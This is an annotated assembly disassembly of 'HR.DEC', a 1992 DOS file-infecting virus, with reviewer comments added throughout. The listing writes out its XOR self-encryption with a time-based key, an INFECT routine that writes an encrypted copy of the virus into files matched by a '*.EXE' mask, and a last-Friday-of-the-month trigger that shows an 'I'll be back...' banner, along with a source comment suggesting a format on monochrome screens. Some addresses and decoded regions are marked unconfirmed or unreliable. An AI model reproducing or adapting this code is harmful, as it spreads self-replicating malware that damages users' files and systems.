;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
; Entry point at CS:0100h (see the ORG above). The short jump skips the NOP
; and the two key bytes and lands on BEGIN.
START: JMP Short BEGIN
;---------------------------------------------------
NOP
; ENCRKEY is a 16-bit key, not a single byte: CRYPT XORs whole words against
; the word at DS:ENCRKEY, and H00520 stores DX into DS:[0103h], which is this
; address (2-byte JMP + 1-byte NOP after the 0100h origin). A disassembler
; that decodes these bytes as code shows 0Ch 32h as OR AL,32h.
ENCRKEY:DB 0Ch,32h ; key word: low byte 0Ch, high byte 32h (both are used)
BEGIN: CALL CRYPT ; XOR the body from MESSAGE onward with ENCRKEY (run-time decryption)
JMP H00520 ; H00520 lies inside the range CRYPT has just processed
;---------------------------------------------------
; CRYPT: XOR every word from MESSAGE onward with the word at ENCRKEY, in place.
; XOR is its own inverse, so the same routine is used to decrypt (BEGIN) and
; to encrypt (INFECT).
; In:    DS = segment holding the body. STOSW stores through ES:DI and this
;        routine does not load ES, so it relies on ES = DS on entry.
; Out:   CX preserved (PUSH/POP). AX, SI, DI and flags changed; DF cleared.
; Analysis note: nothing before MESSAGE (the entry stub, this routine, INFECT)
; is ever XORed, so those bytes stay in the clear in every copy INFECT writes;
; only the two ENCRKEY bytes at 0103h differ once H00520 has rewritten them.
CRYPT: PUSH CX ; keep the caller's CX (INFECT holds its byte count there)
MOV SI,OFFSET MESSAGE ; source = first byte of the XORed region
MOV DI,SI ; destination = same offset
; NOTE(review): 0766h words is 0ECCh bytes; starting at MESSAGE (013Ah, per
; the MOV SI,013Ah at H00541) that runs past the CODE END of 0072Ch given in
; the file header. Confirm the count against the binary.
MOV CX,0766h ; loop count, in words
CLD ; make LODSW/STOSW step upward
LOOP_1: LODSW ; AX = word at DS:SI, SI += 2
XOR AX,DS:ENCRKEY ;DS may not be needed
STOSW ; store AX at ES:DI, DI += 2
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
; INFECT: write the body to the file whose handle is stored at HANDLE.
; CRYPT is called before the write and again after it, so the copy on disk
; is XORed from MESSAGE onward while the copy in memory is restored.
; DOS call used: INT 21h AH=40h (write to handle) with BX = handle,
; CX = byte count, DS:DX = buffer.
; The result of the write is not checked: the second CRYPT call overwrites
; AX and the flags before this routine returns.
INFECT: MOV DX,0100h ;Offset to begin at
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;Redundant save: CRYPT does not modify BX.
MOV CX,062Ch ;CX=number of bytes to write (the FILE SIZE in the header)
CALL CRYPT ;Encrypt before saving; CRYPT preserves CX
POP BX ;Redundant restore, see PUSH BX above.
MOV AX,4000h ;AH = 40h, write to file. Loaded after CRYPT, which changes AX.
INT 21h ;Infect the file: write 062Ch bytes from DS:0100h.
PUSH BX ;Again, BX never changes.
CALL CRYPT ;Second XOR restores the body in memory
POP BX
RET ;RET_Near
;---------------------------------------------------
; These are the big, red block letters that are shown when it goes off.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;This area is perplexing. Doesn't seem to be ever called, nor read from.
; NOTE(review): this looks like data that the disassembler decoded as
; instructions rather than real code. It sits between two data tables (the
; file-mask bytes above and the "ARMOR" string below), and the byte run
; 2Ah,0D1h,0EDh,4Ah seen here at 0046Eh-00471h appears again as plain data
; at 00499h-0049Ch. Treat the mnemonics below as unreliable; the byte values
; in the right-hand column are the trustworthy part. Confirm against the binary.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
DB "ARMOR" ;0047B 41524D4F52
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488
DB 8 DUP("?") ;00489 3F
DB "EXE" ;00491 455845
DB 07h ;00494
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E
DB "x" ;0049F 78
DB 0F0h ;004A0
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3
DB "-]" ;004B4 2D5D
DB 04h ;004B6
DB 88h ;004B7
DB 04h ;004B8
DB 9Eh ;004B9
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
; HANDLE: INFECT loads a word from this address into BX as the DOS file
; handle (MOV BX,DS:[HANDLE]). The two bytes below form that word, 0005h in
; this listing; presumably a leftover run-time value captured with the sample.
HANDLE: DB 05h ;004FC
DB 00h ;004FD
DB 02h ;004FE
DB "x" ;004FF 78
DB 0F0h ;00500
DB 16h ;00501
DB " " ;00502 20
DB 00h ;00503
DB 0CDh ;00504
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
; INT 21h AH=30h returns the DOS major version in AL; versions below 2 branch
; to H0056B, which is outside this excerpt. Otherwise INT 21h AH=2Ch (get
; time) returns seconds in DH and hundredths of a second in DL, and that word
; is stored at DS:[0103h], the address of ENCRKEY. Any later CRYPT call
; therefore uses the new key. The key is stored before MESSAGE, so it is never
; XORed itself and can be read directly from offset 0103h of the image.
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____
; Check to see if it's the last Friday in month, if so, go off.
; INT 21h AH=2Ah (get date) returns the day of the month in DL and the day of
; the week in AL (0 = Sunday). The payload at H00541 is reached only when
; DL >= 19h (25) and AL = 05h (Friday); a Friday on or after the 25th is
; always the last one of its month. Every other date goes to H005F2, which is
; outside this excerpt.
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___
;---------------------------------------------------
; GO OFF!
; Payload display path, reached only from the date check at H00531.
; INT 10h AH=0Fh returns the current video mode in AL. Mode 07h (monochrome
; text) branches through H00568 to H005DC, which is outside this excerpt.
; NOTE(review): the "format" wording on the JZ below cannot be confirmed from
; the lines shown here; verify what H005DC does before relying on it.
; Any other mode: switch to mode 03h, set the cursor shape with CX=0808h,
; point ES:DI at B800:0000 (colour text memory) and SI at 013Ah (the offset
; of MESSAGE), then call H0057E with CX=0319h. H0057E is outside this
; excerpt; presumably it expands the MESSAGE bytes onto the screen - confirm.
; The final JMP returns to the date check at H00531, so this path repeats for
; as long as that check keeps matching.
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000
MOV CX,0319h ;00560 B91903
CALL H0057E ; . . . . . . . . . ;00563 E81800
JMP Short H00531 ;00566 EBC9
;---------------------------------------------------
; Trampoline: the JZ at 00547h is a short jump, so it lands here and is
; forwarded to H005DC (outside this excerpt).
H00568: JMP Short H005DC ;00568 EB72 _r